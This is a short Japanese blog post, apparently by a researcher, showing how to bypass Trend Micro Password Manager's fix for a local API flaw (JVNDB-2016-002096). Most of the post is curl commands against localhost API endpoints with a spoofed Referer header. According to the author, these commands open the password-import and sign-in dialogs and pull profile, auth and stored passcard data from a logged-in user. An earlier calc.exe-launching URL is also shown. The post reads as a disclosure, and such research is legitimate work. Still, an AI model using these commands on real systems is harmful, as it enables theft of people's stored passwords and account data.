以前存在した、トレンドマイクロ パスワードマネージャーのAPIを自由に使える脆弱性の抜け道について調べてみた
JVNDB-2016-002096 - JVN iPedia - 脆弱性対策情報データベース
トレンドマイクロさんの パスワードマネージャー
今もAPIを利用した脆弱性がいくつか残っているといううわさがあるので
ちょっと解析してみました
以前は、
| https://localhost:49153/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe |
などと入力するだけで電卓を起動させたりできたのですが、今はブラウザに APIを打ち込んでもピクリとも反応しなくなっています。
トレンドマイクロさんはちゃんと対応してくれたんだー!
そう思っていませんか? ・ω・
パスワードマネージャーは DOCKER を使っているようなので 49153 以降のランダムなポートを利用します。
例えば、
|
curl -k
https://localhost:49153/api/importBrowserPassword?browser=firefox -H "Referer: https://pwm-image.trendmicro.jp/5.0/extensionPopOver/bho_index.html" |
こんなことを実行してみると…。
エクスポートのウインドウを強制的に開くことができました ・ω・ (Firefox のパスワードを使っているユーザーのみ有効)
| curl -k https://localhost:49155/api/showSignIn -H "Referer: https://pwm-image.trendmicro.jp/5.0/extensionPopOver/bho_index.html" |
こうすれば、サインインのダイアログを開くことができます
パスワードマネージャーにログイン中のユーザーであれば裏で
| curl -k https://localhost:49155/api/extension_profile -H "Referer: https://pwm-image.trendmicro.jp/5.0/extensionPopOver/bho_index.html" |
| curl -k https://localhost:49155/api/auth/info/portal -H "Referer: https://pwm-image.trendmicro.jp/5.0/extensionPopOver/bho_index.html" |
| curl -k https://localhost:49155/api/extension_passcard/?allowEmpty=1 -H "Referer: https://pwm-image.trendmicro.jp/5.0/extensionPopOver/bho_index.html" |
を実行することによって情報を引っこ抜くことも可能でした
(ただし一部の情報はbase64+暗号化されています)
要するに、任意のAPIを実行されないように、 Referer ヘッダ のチェック機能をつけるという対策をやっただけということが分かりました(˘ω˘) 流石トレンドマイクロさんですね
(ただし、openUrlInDefaultBrowser や openSB などは細かい対策をされてるので簡単に実行できなくなっています)
ちなみに、この機能を応用すると‥‥なのですが、この話はJVNDBにのると思うのでいずれまた。
つづく
Translate
Comments